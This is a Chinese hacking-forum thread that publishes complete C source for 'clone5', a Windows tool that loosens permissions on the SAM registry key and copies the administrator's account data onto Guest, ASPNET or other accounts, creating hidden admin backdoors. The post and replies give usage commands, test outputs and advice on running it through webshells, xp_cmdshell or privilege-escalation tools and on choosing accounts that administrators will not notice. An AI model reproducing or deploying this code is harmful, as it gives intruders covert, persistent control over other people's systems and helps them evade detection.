[原创]支持XP/2k/2k3下完美进行任意用户克隆的C源码(可在webshell运行)
软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
本程序是基于dahubaobao的源程序的基础上进行了修改,改正了源程序中的一个严重BUG(原程序会引起用户管理的混乱),本版本加入了注册表提权和恢复功能,因此能够完美的支持XP/2000/2003,下一个版本我打算实现直接输入用户名克隆和密码修改功能!感谢dahubaobao和sinister的指点
SHELL里可执行是指:至少有一个管理员权限的shell,如:jsp/MYSQL/SERV提权/反弹CMDSHELL
软件使用问题整理:
引用第46楼kuba8于2007-04-25 20:16发表的 :
我发现在国外有些机上不能执行,不知道为什么~
1、这种情况很可能是SAM键值做了安全设置,比如只允许system完全控制,administrators组成员连读取权限都没有,解决方法是获得一个system权限的SHELL,比如用SQL的XP_CMDSHELL来运行这个命令,或者利用服务启动的后门一般都是system权限的,所以你可以找一个第三方的后门程序来执行这个程序。
2、最近我在做一个渗透项目的时候发现,如果服务器为域服务器,也会出现clone5 -l列不出或列不全用户的情况,这种情况下建议大家不要使用任何的用户克隆类软件,否则把用户的机器搞出问题了就不好玩了,建议大家可以留个后门,解决方案等有时间再进行研究。
3、2000下停用了账号依然可以正常使用,03下面必须启用,删除了克隆用户也没问题,总之和正常用户一样进行操作就可以了,克隆完之后要使用net user aspnet test来修改密码。
4、克隆之后会启用该用户。
5、测试克隆用户的方法:
runas /user:aspnet cmd
net share (能执行代表具有管理员权限)
6、任意用户均可以克隆,建议大家的眼光不要局限克隆GUEST,多克隆其它的一些账号,比如ASPNET和tsinternetuser等。
[language=c]#include <windows.h>
#include <string.h>
#include <stdio.h>
#include <aclapi.h>
char name[50][30];
int KeyN=0;
LPTSTR lpObjectName;
SE_OBJECT_TYPE ObjectType; //#include <aclapi.h>
PACL OldDACL,NewDACL;
PSECURITY_DESCRIPTOR SD;
EXPLICIT_ACCESS ea;
//OpenKey(),ViewUser(),ListUser()函数用到的变量
//显示用户名对应的安全标识符:
void OpenKey (char *key);
int ViewUser (char *key);
int ListUser (void);//列出用户名和类型值(用户SID)
int Clone (char *C_sid);//克隆帐户
void Usage (void);//帮助信息
//设置注册表的存取权限:
void new();
void old();
void main (int argc, char *argv[])
{
char C_Sid[10];
int n;
if(argc<2)
{Usage();
return;}
//提升注册表SAM键的权限:
new();
//如何使用命令行参数的方法:
for (n=1;n<argc;n++)
{
if (argv[n][0] == '-')
{
switch(argv[n][1])
{
case '?':
case 'h':
case 'H':Usage();
break;
case 'l':
case 'L':ListUser();
old();
break;
case 'c':
case 'C':
if(argc<3)
{printf("Useage:%s -c 1F5\n",argv[0]);
old();
break;}
strcpy(C_Sid,argv[2]);//获得屏幕输入并存入C_Sid字符数组
if (strlen(C_Sid)<=10)
Clone(C_Sid);
else
printf("Error\n");
//恢复注册表的权限:
old();
break;
}
}
}
}
void OpenKey (char *key)
{
HKEY hkey;//注册表键值的句柄
DWORD dwIndex=0,lpcbname=100,ret=0;
char T_name[100],Buffer[100];
FILETIME lpftlast;
int i=0;
//下面是字符数组清0:
ZeroMemory(Buffer,100);
ZeroMemory(T_name,100);
ZeroMemory(name,1500);
RegOpenKeyEx(HKEY_LOCAL_MACHINE, //根键名或已打开项的句柄
key, //传递一个参数,欲打开的注册表项
0, //未用,设为0即可
KEY_ALL_ACCESS, //描述新键值安全性的访问掩码
//它们的组合描述了允许对这个项进行哪些操作
&hkey);//装载上面打开项的句柄
for(i=0;ret==ERROR_SUCCESS;i++,dwIndex++)//遍历子键中的每个值
{
ret=RegEnumKeyEx(hkey,dwIndex,T_name,&lpcbname,
NULL,NULL,NULL,&lpftlast);
//dwIndex:欲获取的子项的索引。第一个子项的索引编号为零
//T_name:用于装载指定索引处项名的一个缓冲区
//&lpcbname:指定一个变量,用于装载lpName缓冲区的实际长度(包括空字符)。
//一旦返回,它会设为实际装载到lpName缓冲区的字符数量
//NULL:未用,设为零
//NULL:项使用的类名
//NULL:用于装载lpClass缓冲区长度的一个变量
//&lpftlast:FILETIME,枚举子项上一次修改的时间
strcat(name[i],T_name);//将每个子键名加入到name[i]数组中
ZeroMemory(T_name,100);//清0
lpcbname=100;
}
//printf("subkey=%s\n",name[0]);//administrator
RegCloseKey(hkey); //关闭注册键
//拼接用户名:
for(KeyN=0;KeyN<i;KeyN++)
{
strcat(Buffer,name[KeyN]);
strcat(Buffer,"\n\r");
}
}
int ViewUser (char *key)
{
HKEY hkey;
DWORD lpType=0,ret;
char S_name[10];
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,
key,//如://SAM\\SAM\\Domains\\Account\\Users\\Names\\administrator
0,
KEY_ALL_ACCESS,
&hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
RegQueryValueEx(hkey,NULL,NULL,&lpType,NULL,NULL);
//NULL:要获取值的名字
//NULL:未用,设为零
//&lpType:用于装载取回数据类型的一个变量
//NULL:用于装载指定值的一个缓冲区
//NULL:用于装载lpData缓冲区长度的一个变量
wsprintf(S_name,"%X\n\r",lpType);
printf("%s",S_name);
return 1;
}
int ListUser (void)
{
int n;
char Buffer[70]="SAM\\SAM\\Domains\\Account\\Users\\Names\\";
char Temp[40]={'\0'};
OpenKey("SAM\\SAM\\Domains\\Account\\Users\\Names");
for(n=0;n<KeyN;n++)
{
strcat(Buffer,name[n]);//SAM\\SAM\\Domains\\Account\\Users\\Names\\administrator
wsprintf(Temp,name[n]);
strcat(Temp,"===>");
printf("%s",Temp);
ViewUser(Buffer);
strcpy(Buffer,"SAM\\SAM\\Domains\\Account\\Users\\Names\\");
}
return 1;
}
int Clone(char *C_sid)
{
HKEY hkey,C_hkey;
DWORD Type=REG_BINARY,SizeF=1024*2,SizeV=1024*10,ret;
char CloneSid[100];
LPBYTE lpDataF,lpDataV;
//为注册表的F与V值分配空间:
lpDataF = (LPBYTE) malloc(1024*2);
lpDataV = (LPBYTE) malloc(1024*10);
//清0:
ZeroMemory(lpDataF,1024*2);
ZeroMemory(lpDataV,1024*10);
ZeroMemory(CloneSid,100);
strcpy(CloneSid,"SAM\\SAM\\Domains\\Account\\Users\\00000");
strcat(CloneSid,C_sid);//如:SAM\\SAM\\Domains\\Account\\Users\\000001F5
ret= RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SAM\\SAM\\Domains\\Account\\Users\\000001F4", //administrator的子键
0,
KEY_ALL_ACCESS,
&hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
//读出F值然后存入lpDataF中:
ret = RegQueryValueEx(hkey,"F",NULL,
&Type,lpDataF,&SizeF);
if(ret==ERROR_SUCCESS)
;
else
return 0;
//读出v值然后存入lpDataV中:
ret = RegQueryValueEx(hkey,"V",NULL,
&Type,lpDataV,&SizeV);
if(ret==ERROR_SUCCESS)
;
else
return 0;
//下面是打开需克隆用户如guest的键值:
ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
CloneSid, //如:SAM\\SAM\\Domains\\Account\\Users\\000001F5
0,
KEY_ALL_ACCESS,
&C_hkey);
if(ret==ERROR_SUCCESS)
;
else
return 0;
//将lpDataF中的值来替换需克隆用户的F值:
ret= RegSetValueEx(C_hkey,"F",0,
REG_BINARY,
lpDataF,
SizeF);
//C_hkey:根键名或已打开项的句柄
//“F”:要设置值的名字
//0:未用,设为零
//REG_BINARY:要设置的数量类型
//lpDataF:包含数据的缓冲区中的第一个字节
//SizeF:lpData缓冲区的长度
if(ret==ERROR_SUCCESS)
printf("Clone User Success\n");
else
{
printf("Clone User FAIL\n");
return 0;
}
//关闭已打开的注册表句柄:
RegCloseKey(hkey);
RegCloseKey(C_hkey);
return 1;
}
void new()
{//下面是设置SAM键的权限为everyone:
lpObjectName = "MACHINE\\SAM\\SAM";
ObjectType =SE_REGISTRY_KEY;
//建立一个空的ACL;
if (SetEntriesInAcl(0, NULL, NULL, &
OldDACL)!=ERROR_SUCCESS)
return;
if (SetEntriesInAcl(0, NULL, NULL, &NewDACL)!=ERROR_SUCCESS)
return;
//获取现有的ACL列表到OldDACL:
if(GetNamedSecurityInfo(lpObjectName, ObjectType,
DACL_SECURITY_INFORMATION,
NULL, NULL,
&OldDACL,
NULL, &SD) != ERROR_SUCCESS)
printf("指定的键不存在!\n");
// 本文转自 C++Builder 研究 - [url]http://www.ccrun.com/article.asp?i=563&d=tshoza[/url]
//设置用户名"Everyone"对指定的键有所有操作权到结构ea:
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea,
"Everyone", // name of trustee
KEY_ALL_ACCESS, // type of access
SET_ACCESS, // access mode
SUB_CONTAINERS_AND_OBJECTS_INHERIT); //子键继承它的权限
//合并结构ea和OldDACL的权限列表到新的NewDACL:
if(SetEntriesInAcl(1, &ea, NULL, &NewDACL) != ERROR_SUCCESS)
goto Cleanup;
//把新的ACL写入到指定的键:
SetNamedSecurityInfo(lpObjectName, ObjectType,
DACL_SECURITY_INFORMATION,
NULL, NULL,
NewDACL,
NULL);
//释放指针
Cleanup:
if(SD != NULL)
LocalFree((HLOCAL) SD);
if(NewDACL != NULL)
LocalFree((HLOCAL) NewDACL);
if(OldDACL != NULL)
LocalFree((HLOCAL) OldDACL);
}
void old()
{
//恢复注册表的权限:
BuildExplicitAccessWithName(&ea,
"system", // name of trustee
KEY_ALL_ACCESS, // type of access
SET_ACCESS, // access mode
SUB_CONTAINERS_AND_OBJECTS_INHERIT); //让子键继承他的权限
if(SetEntriesInAcl(1, &ea, NULL, &OldDACL) != ERROR_SUCCESS)
goto Cleanup;
//把旧的ACL写入到指定的键:
SetNamedSecurityInfo(lpObjectName, ObjectType,
DACL_SECURITY_INFORMATION,
NULL, NULL,
OldDACL,
NULL);
//释放指针
Cleanup:
if(SD != NULL)
LocalFree((HLOCAL) SD);
if(NewDACL != NULL)
LocalFree((HLOCAL) NewDACL);
if(OldDACL != NULL)
LocalFree((HLOCAL) OldDACL);
}
//输出帮助的典型方法:
void Usage (void)
{
fprintf(stderr,"===============================================================================\n"
"\t名称:2003与2000下克隆任意用户程序\n"
"\t环境:Win2003 + Visual C++ 6.0\n"
"\t作者:[email]pt007@vip.sina.com[/email]\n"
"\tQQ:7491805\n"
"\t声明:本软件由pt007原创,转载请注明出处,谢谢!\n"
"\n"
"\t使用方法:\n"
"\t\"-H\":帮助信息\n"
"\t\"-L\":列出系统中用户对应的SID\n"
"\t\"-C 1F5\":克隆帐户,输入SID即可\n"
"\t 对应注册表HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\n"
"\t 对应注册表HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\n"
"\n"
"\t注意事项:\n"
"\t由于SID的前5位都是\"0\",所以不必输入,直接输入最后三位\n"
"\t例如:000001F5,则直接输入1F5,即可将Guest帐户克隆\n"
"===============================================================================\n");
}[/language] C:\Documents and Settings\Administrator\桌面\clone5>clone5 -C 1F5
Clone User Success
C:\Documents and Settings\Administrator\桌面\clone5>net user guest
用户名 Guest
全名
注释 供来宾访问计算机或访问域的内置帐户
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2006-9-17 13:24
密码到期 从不
密码可更改 2006-9-17 13:24
需要密码 Yes
用户可以更改密码 No
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2007-4-18 20:29
可允许的登录小时数 All
本地组成员 *Guests
全局组成员 *None
命令成功完成。 难道这么牛?一点痕迹都米有?
或是没成功? 楼上的你已经克隆成功了,用如下的方法进行测试:
runas /user:guest cmd
net share (能执行这个命令就是管理员权限了,看不见就对了) 果然成功了,厉害
克隆的Guest的密码为空是吧? [quote]引用第4楼liuyes于2007-04-18 22:16发表的 :
果然成功了,厉害
克隆的Guest的密码为空是吧?[/quote]
net user guest test (你自已可以改密码) [quote]引用第6楼pt007于2007-04-18 22:21发表的 :
net user guest test (你自已可以改密码)[/quote]
了解,赞~~~
顺便问一下怎么删除克隆的用户?
net user ... /del? 成功了,虽然在命令行下看不出是administrators组的,但实际上已经有系统权限了.
我建了个01这个用户``````可执行任何命令
不知在webshell下能不能成功啊~~~
还有``````忘了```我一直在找ani网马的 EXPLOIT代码,```斑竹能给我一个吗?```我emai: [email]18961@qq.com[/email] QQ:189613 可在webshell里直接运行?
不太了解
还有个问题,也不算问题,guest是停用的,克隆后还是停用,能不能打开? [quote]引用第9楼zlty于2007-04-18 22:25发表的 :
可在webshell里直接运行?
不太了解
还有个问题,也不算问题,guest是停用的,克隆后还是停用,能不能打开?[/quote]
2000下停用了账号依然可以正常使用,03下面必须启用,
删除了克隆用户也没问题,总之和正常用户一样进行操作就可以了 在webshell里能有权限执行特殊的API写的程序?不解 [s:270] webshell也能运行?
不解,就算能运行,那完了之后的密码是多少? 不要说用net user 改,在webshell里是改不了的 经测试,在webshell里不能直接运行。能通过serv-u提权工具来运行,个人认没太大的实用价值。因为能运行这个工具,想信一定有想当大的权限了,那何必还要用这个工具呢? 可在webshell里直接运行?吓我一跳.........靠!有这我不是无敌了么! C:\WINNT\system32>runas /user:guest cmd
键入密码 guest:
试图启动 "cmd" 作为用户 "guest"...
RUNAS 错误: 无法运行 - cmd
1062: 服务未启动。
LZ `~ 好象不可以``` WEBSHELL中我没测试成功..... Webshell的权限不是默认的guest权限?
guest在不提权的情况下能克隆管理员?..... [s:289] [quote]引用第0楼pt007于2007-04-18 21:47发表的 [原创]第一个支持2000和2003下完美进行用户克隆的C源码(可在webshell里直接运行) :
软件作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
WEBSHELL里可执行是指:至少有一个管理员权限的shell,如:jsp/MYSQL/SERV提权/反弹CMDSHELL
[code]#include <windows.h>
.......[/quote]
WEBSHELL里可执行是指:至少有一个管理员权限的shell,如:jsp/MYSQL/SERV提权/反弹CMDSHELL
我倒,要是我有管理员的shell,我还要webshell干吗[s:289] 不错,测试N台2003机器,全部同过.2K也未任何异常
绝对可以称的上完美!!
期待更强的版本!!!!
如果可以抓到2003的管理员密码,将是一大亮点. webshell意义不大,基本上没有哪个获得的webshell是admin权限的(当然有的时候也会碰到SB管理员配制的SB系统,那你真是走运)。一般都是有一个admin的cmdshell然后运行这个来科隆的。
用法很多,看个人发挥
LZ基本很快,欣喜中。。。。
提个小建议,把你的代码再完美一些,允许使用者直接输入科隆的账户名字就可以,不要输入SID。
try it! [s:269] 带参数: shell.exe fuck pass [quote]引用第19楼qsg1982于2007-04-19 10:09发表的 :
C:WINNTsystem32>runas /user:guest cmd
键入密码 guest:
试图启动 "cmd" 作为用户 "guest"...
RUNAS 错误: 无法运行 - cmd
1062: 服务未启动。
.......[/quote]
你的Runas服务关了。 dahubaobao这小子2005年时候也写过和楼主很类似的工具代码,这里可以找到:
[url]http://cache.baidu.com/c?word=dahubaobao&url=http%3A//blog%2Ecsdn%2Enet/freexploit/archive/2005/01/19/259953%2Easpx&p=8d63cf0f909f12a05be6c4710e1786&user=baidu[/url]
[url]http://cache.baidu.com/c?word=dahubaobao&url=http%3A//www%2Ecnhacker%2Ecom/bbs/read%2Ephp%3Ftid%3D6275&p=8567cc16d9c04aff57ed9729594a9f&user=baidu[/url] [quote]引用第27楼eviloctal于2007-04-19 17:18发表的 :
dahubaobao这小子2005年时候也写过和楼主很类似的工具代码,这里可以找到:
[url]http://cache.baidu.com/c?word=dahubaobao&url=http%3A//blog%2Ecsdn%2Enet/freexploit/archive/2005/01/19/259953%2Easpx&p=8d63cf0f909f12a05be6c4710e1786&user=baidu[/url]
[url]http://cache.baidu.com/c?word=dahubaobao&url=http%3A//www%2Ecnhacker%2Ecom/bbs/read%2Ephp%3Ftid%3D6275&p=8567cc16d9c04aff57ed9729594a9f&user=baidu[/url][/quote]
他那个程序没有注册表提权的部分,所以只能受限于2000下使用,外面流传的程序都没有注册表提权的功能,不过在这里还是感谢dahubaobao,本程序是基于dahubaobao的源程序的基础上进行了修改,加入了注册表提权和恢复功能.下一个版本我打算实现直接输入用户名克隆和密码修改功能! 在webshell里能运行有说明
看清楚
呵呵
要有执行命令权限啊
至少有cmdshell 才行.呵呵 clone的意义已经不大了
不过还是不错
算是clone的一个小飞跃了
这个c的代码还能继续改进
给你改改
喜欢c写的 [s:266] 不错的工具
执行后计算机管理和CMD里都查看不出来此隐藏用户 网上流传的代码是不能在2003下跑,但是这个版本的比较完美,支持2003 guest 用户被起用..
这个负责的管理员一看就知道有问题.就算不知道有问题他也会把他停了啊....
唯一缺陷. 晕死...各位,版主不是说了么WEBSHELL要管理员权限运行才可以..先了解一下系统好不好..版主已经很有耐心了...如果想能直接在GUEST下的WEBSHELL中的话除非自己加上个IIS或其它的EXP.. 小声的问一下,这个和AIO.exe程序的CLONE有什么不同? 测试在虚拟机里
-l参数无效
暂时测试到着 这个有administrator权限的webshell和别的shell没区别,
这种情况也有啊,比如windows下php的,jsp的,好多一上去就是admin 2000下测试。。。。
C:\Documents and Settings\Administrator>cd\
C:\>clone5 -h
指定的键不存在!
===========================================================================
名称:2003与2000下克隆任意用户程序
环境:Win2003 + Visual C++ 6.0
作者:[email]pt007@vip.sina.com[/email]
QQ:7491805
声明:本软件由pt007原创,转载请注明出处,谢谢!
使用方法:
"-H":帮助信息
"-L":列出系统中用户对应的SID
"-C 1F5":克隆帐户,输入SID即可
对应注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
对应注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
注意事项:
由于SID的前5位都是"0",所以不必输入,直接输入最后三位
例如:000001F5,则直接输入1F5,即可将Guest帐户克隆
===========================================================================
C:\>clone5 -l
指定的键不存在!
===>
C:\>clone5 -c 1f5
指定的键不存在!
C:\>怎么回事???
不知道!!!
[s:268] [s:268] [s:268] 2003下需要启用用户才行,这一点还不够完美~ [s:265] [quote]引用第33楼loster于2007-04-20 09:25发表的 :
小声的问一下,这个和AIO.exe程序的CLONE有什么不同?[/quote]
试了下
几乎没有区别
功能都是创建隐藏ID C:\Documents and Settings\haijun
用户名 xr$
全名
注释
用户的注释
国家(地区)代码 000 (系统
帐户启用 Yes
帐户到期 从不
上次设置密码 2007-4-23
密码到期 从不
密码可更改 2007-4-25
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2007-4-23
可允许的登录小时数 All
本地组成员
全局组成员 *None
命令成功完成。
本地组成员不显示? guest察看属于权限时候。会出现错误框 [s:289] [quote]引用第31楼charley008于2007-04-20 06:43发表的 :
guest 用户被起用..
这个负责的管理员一看就知道有问题.就算不知道有问题他也会把他停了啊....
唯一缺陷.[/quote]
确定guest被启用。。。但是停不了! [quote]引用第41楼cnx于2007-04-23 15:43发表的 :
确定guest被启用。。。但是停不了![/quote]
大家不要光克隆GUEST,任何用户都可以克隆的,比如ASPNET/tsinternetuser啥的,老盯着guest这一个用户当然容易被发现. [quote]引用第42楼pt007于2007-04-23 16:07发表的 :
大家不要光克隆GUEST,任何用户都可以克隆的,比如ASPNET/tsinternetuser啥的,老盯着guest这一个用户当然容易被发现.[/quote]
请问下怎么克隆其他的帐户啊。
假设我要克隆一个hack的ID
命令? clone5.exe
麻烦你了 clone5.exe -l 查看sid的 我发现在国外有些机上不能执行,不知道为什么~ [quote]引用第46楼kuba8于2007-04-25 20:16发表的 :
我发现在国外有些机上不能执行,不知道为什么~[/quote]
1、这种情况很可能是SAM键值做了安全设置,比如只允许system完全控制,administrators组成员连读取权限都没有,解决方法是获得一个system权限的SHELL,比如用SQL的XP_CMDSHELL来运行这个命令,或者利用服务启动的后门一般都是system权限的,所以你可以找一个第三方的后门程序来执行这个程序。
2、最近我在做一个渗透项目的时候发现,如果服务器为域服务器,也会出现clone5 -l列不出或列不全用户的情况,这种情况下建议大家不要使用任何的用户克隆类软件,否则把用户的机器搞出问题了就不好玩了,建议大家可以留个后门,解决方案等有时间再进行研究。 net user hacker$ hacker /add
clone5 -c 1f5 hacker$ hacker
这样的完整命令?
我2K3下不行,计算机管理 里面能看到 你的clone5 -c 1f5 就已经是克隆guest帐号了,在说这个程序不支持1f5之后的扩展参数。 那么克隆后的 帐户密码是 空 ? C:\Documents and Settings\yiyi\桌面\clone5>C -L
ASPNET===>3EE
Guest===>1F5
IUSR_888FDC===>3EB
IWAM_888FDC===>3EC
SUPPORT_388945a0===>3E9
xy888fdc===>1F4
yiyi===>3FD
===>0
C:\Documents and Settings\yiyi\桌面\clone5>C -c 1F4
Clone User Success
C:\Documents and Settings\yiyi\桌面\clone5>net user guest 113368190
命令成功完成。
C:\Documents and Settings\yiyi\桌面\clone5>runas /user:guest cmd
输入 guest 的密码:
试图将 cmd 作为用户 "888FDC\guest" 启动...
RUNAS 错误: 无法运行 - cmd
1327: 登录失败: 用户帐户限制。可能的原因包括不允许空密码,登录时间限制,或强制的
策略限制。 E:\HARK\TOOLS\clone5>clone5 -L
E:\HARK\TOOLS\clone5>
就没有反应了?为什么不能查看其它的DIS呢
页:
[1]
2